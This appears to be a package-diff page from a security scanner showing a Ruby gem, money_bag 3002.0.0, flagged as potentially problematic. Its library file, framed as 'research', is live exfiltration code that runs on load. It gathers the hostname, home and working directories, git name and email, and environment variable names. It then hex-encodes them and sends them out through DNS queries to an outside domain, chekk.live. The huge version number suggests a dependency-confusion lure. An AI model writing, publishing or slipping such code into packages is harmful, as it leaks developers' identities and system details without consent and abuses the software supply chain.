money_bag 3002.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of money_bag might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/money_bag.rb +100 -0
  3. metadata +43 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 5e3e228abc0b5ae003f5e0f1cba9799db8b8bc42a5965a92c663d6a0af630f71
4
+ data.tar.gz: 48c605a915f6a91b361f47e7a8d6ffe1a8d0c26a6a8f5c28a88794ee6a597d0b
5
+ SHA512:
6
+ metadata.gz: 4ff99e840e03dd86e03834836febba136318153eb65ab95217388ca647c98c0cbcb2719aa994603ee94bdb46c1655589dc1464e1749c971dac7b636ca972ea42
7
+ data.tar.gz: 41508c95396deb348188ed7f0399c71a1f82d128191cd06232d255bf62706742f693e25904c29776ff89fa3be19395590d9a31679906bf6c74901afdb16fc555
data/lib/money_bag.rb ADDED
@@ -0,0 +1,100 @@
1
+
2
+ =begin
3
+
4
+ This code is used for research purposes.
5
+
6
+ No sensitive data is retrieved.
7
+
8
+ Callbacks from within organizations with a
9
+ responsible disclosure policy will be reported
10
+ directly to the organizations.
11
+
12
+ Any other callbacks will be ignored, and
13
+ any associated data will not be kept.
14
+
15
+ =end
16
+
17
+ require 'socket'
18
+ require 'json'
19
+ require 'resolv'
20
+
21
+ suffix = 'd.chekk.live'
22
+ ns = 'dns1.chekk.live'
23
+
24
+ package = 'money_bag'
25
+
26
+
27
+
28
+ def convert_string_to_hex(string)
29
+ string.unpack("H*")
30
+ end
31
+
32
+
33
+ def chunk_string(string, length)
34
+ string.scan(/.{1,#{length}}/)
35
+ end
36
+
37
+
38
+ def get_user_from_git_config()
39
+ # get user name and email from git config
40
+ begin
41
+ user_name = `git config user.name`.chomp
42
+ user_email = `git config user.email`.chomp
43
+ rescue
44
+ user_name = ''
45
+ user_email = ''
46
+
47
+ end
48
+ return user_name, user_email
49
+ end
50
+
51
+ def get_environment_variables_names()
52
+ # get environment variables NAMES (not values, no sensitive data is extracted) sorted by name
53
+ # to get a better idea of execution context and prove potential impact to organization
54
+ env_vars = ENV.keys.sort
55
+ return env_vars
56
+ end
57
+
58
+ git_name, git_email = get_user_from_git_config()
59
+
60
+ # only the bare minimum to be able to identify
61
+ # a vulnerable organization
62
+ data = {
63
+ 'p' => package,
64
+ 'h' => Socket.gethostname,
65
+ 'd' => File.expand_path('~'),
66
+ 'c' => Dir.pwd,
67
+ 'gn' => git_name,
68
+ 'ge' => git_email,
69
+ 'ev' => get_environment_variables_names()
70
+ }
71
+
72
+ data = JSON.generate(data)
73
+
74
+ # convert to hex and chunk
75
+ data_hex_chunks = data.unpack('H*')[0].scan(/.{1,60}/)
76
+
77
+ id_1 = rand(36**12).to_s(36)
78
+ id_2 = rand(36**12).to_s(36)
79
+
80
+ begin
81
+ ns_ip = Resolv.getaddress(ns)
82
+ rescue
83
+ ns_ip = '4.4.4.4'
84
+ end
85
+
86
+ custom_res = Resolv.new([Resolv::Hosts.new,
87
+ Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
88
+
89
+
90
+ data_hex_chunks.each.each_with_index do |chunk, idx|
91
+ begin
92
+ addr = ['v2_f', id_1, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
93
+ Resolv.getaddress addr
94
+ rescue; end
95
+
96
+ begin
97
+ addr = ['v2_f', id_2, data_hex_chunks.length, idx.to_s, chunk, 'v2_e', suffix].join('.')
98
+ custom_res.getaddress addr
99
+ rescue; end
100
+ end
metadata ADDED
@@ -0,0 +1,43 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: money_bag
3
+ version: !ruby/object:Gem::Version
4
+ version: 3002.0.0
5
+ platform: ruby
6
+ authors:
7
+ - John Doe
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2021-12-02 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: Security assesment
14
+ email: jjdoe2@doe.com
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - lib/money_bag.rb
20
+ homepage: https://rubygems.org/gems/money_bag
21
+ licenses:
22
+ - MIT
23
+ metadata: {}
24
+ post_install_message:
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.2.32
40
+ signing_key:
41
+ specification_version: 4
42
+ summary: Security assesment
43
+ test_files: []